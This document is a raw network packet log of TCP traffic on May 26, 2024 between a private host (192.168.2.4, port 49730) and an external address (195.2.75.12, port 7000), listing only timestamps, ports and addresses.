May 26, 2024 01:21:26.790554047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.790570974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.790643930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.791248083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.791265965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.791307926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.791376114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.791501045 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.792320013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.792346954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.792363882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.792432070 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.796221018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.796264887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.796416044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.812155962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.812186003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.812412977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.812478065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.812534094 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.812797070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.812814951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.813230038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.813426018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.813575983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.813663960 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.816401958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.816626072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.816642046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.816704035 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.816977024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.817048073 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.817346096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.817363024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.817416906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.817759037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.817995071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.818372011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.818392038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.818408966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.818444967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.818478107 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.819245100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.819263935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.819344044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.819525957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.819597006 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.819871902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.819890022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.819906950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.819952011 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.820765972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.820782900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.820823908 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.821345091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.821398020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.821662903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.821679115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.821692944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.821747065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.822278023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.822295904 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.822310925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.822372913 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.822405100 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.822936058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.822962046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.822978020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.822993994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.823031902 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.823067904 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.823843002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.823860884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.823877096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.823935032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.824744940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.824762106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.824775934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.824794054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.824848890 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.824878931 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.825578928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.827568054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.849916935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.849946976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.850028038 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.850063086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.850203991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.850512981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.850591898 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.853559017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.853590965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.853822947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.853895903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.853926897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.853941917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.854147911 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.854254007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.854445934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.854556084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.854650021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.854753971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.854811907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.854994059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.855062962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.855180979 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.855355978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.855504036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.855520964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.855555058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.856089115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.856208086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.856291056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.856453896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.856509924 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.856837034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.856966972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.857172966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.857281923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.858112097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.858129025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.858144999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.858179092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.858230114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.858534098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.858666897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.858731985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.859411955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.859427929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.859519005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.859558105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.859575033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.859747887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.859803915 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.859966993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.860024929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.860112906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.860641003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.860721111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.860763073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.861012936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.862063885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.862144947 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.864512920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.864528894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.864612103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.870606899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871016026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871031046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871189117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871207952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871242046 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.871242046 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.871335030 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.871460915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871478081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.871670961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.875643015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.876702070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.876807928 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.877057076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.877178907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.877197027 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.877254963 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.877657890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.877713919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.877733946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.877934933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.878344059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.878402948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.878473043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.878524065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.878806114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.878946066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.878962994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.879029036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.879559040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.879682064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.879738092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.879864931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.879916906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.880331039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.880436897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.880673885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.880740881 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.880784988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.880836964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.881109953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.885570049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.887403965 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.904133081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.904489994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.904534101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.904668093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.904726982 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.904813051 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.906133890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.906152964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.906168938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.906343937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.907481909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.907572031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.907592058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.907656908 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.907695055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.907843113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.908073902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.908130884 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.908335924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.908354044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.908416033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.908580065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.908875942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.909071922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.909090042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.909122944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.909154892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.909339905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.909781933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.909849882 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.909889936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.910103083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.910562038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.910631895 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.910650969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.910701990 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.910890102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.911166906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.911191940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.911253929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.911333084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.911387920 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.911767006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.911782980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.911847115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.911890030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.912082911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.912295103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.912368059 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.912488937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.912506104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.912539005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.912703991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.912760019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.913075924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.913238049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.913387060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.913403034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.913443089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.913471937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.913853884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.913898945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.913963079 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.914125919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.918814898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.920150995 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.940728903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.940756083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.940851927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.940891981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.941126108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.941157103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.941332102 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.941401005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.941504002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.941600084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.944350004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.944673061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.944713116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.944726944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.944868088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.944869041 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.944905043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.944922924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.944962978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.945293903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.945424080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.945488930 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.946093082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.946372986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.946389914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.946436882 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.946475029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.946486950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.946697950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.946715117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.946757078 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.947047949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.947101116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.947194099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.947211981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.947263002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.947349072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.947899103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.947974920 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.947990894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.948170900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.948187113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.948242903 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.948678970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.948748112 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.948775053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.948934078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.949512959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.949529886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.949578047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.949611902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.949620962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.949811935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.949827909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.949866056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.950151920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.950203896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.950261116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.950412989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.950602055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.950656891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.951113939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.951188087 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.954963923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.954989910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.955080986 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.961507082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.961651087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.961724997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.961977959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.962050915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.962300062 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.962316990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.962356091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.962389946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.966432095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.966459990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.966598034 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.968091965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.968197107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.968369007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.968436003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.968548059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.968708038 CEST	7000	49730	195.2.75.12	192.168.2.4
